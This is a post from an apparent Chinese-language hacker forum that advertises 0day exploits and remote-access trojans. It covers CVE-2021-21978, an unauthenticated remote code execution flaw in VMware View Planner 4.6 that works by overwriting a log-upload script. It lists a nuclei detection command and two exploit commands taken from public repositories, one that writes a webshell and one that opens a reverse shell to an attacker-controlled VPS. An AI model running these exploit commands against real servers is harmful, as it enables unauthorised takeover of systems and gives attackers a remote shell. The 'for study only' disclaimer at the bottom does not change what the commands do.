[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
0day Today Exploit DB Official RSS Channel
Tor
Telegram联系我们
VMware View Planner

POC VMware View Planner

Shacker

Shacker已验证会员

黑客倉庫站長

贡献: 21%
JavaScript: 
## 漏洞概述

VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件`log_upload_wsgi.py`,即可实现RCE

## 影响范围

```http
VMware View Planner 4.6
```

## POC

```bash
nuclei -tags vmware -t cves/ -l urls.txt

Goby
```

## EXP

1、写webshell [@skytina](https://github.com/skytina/CVE-2021-21978)

```bash
python CVE-2021-21978.py https://192.168.80.3
```

2、反弹shell [@me1ons](https://github.com/me1ons/CVE-2021-21978)

```bash
python re-shell.py -u 目标IP -v VPS-IP -p 1234
```
 
CVE-2021-21978
POC  CVE-2021-21978
VMware View Planner 未授权RCE漏洞(CVE-2021-21978)
POC  VMware View Planner 未授权RCE漏洞(CVE-2021-21978)
点击展开...
好评 0 否决票
您必须登录或注册才可回复。
相似主题 热门帖子 查看更多

暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @Hack7er1949  网站地图Sitemap
后退
顶部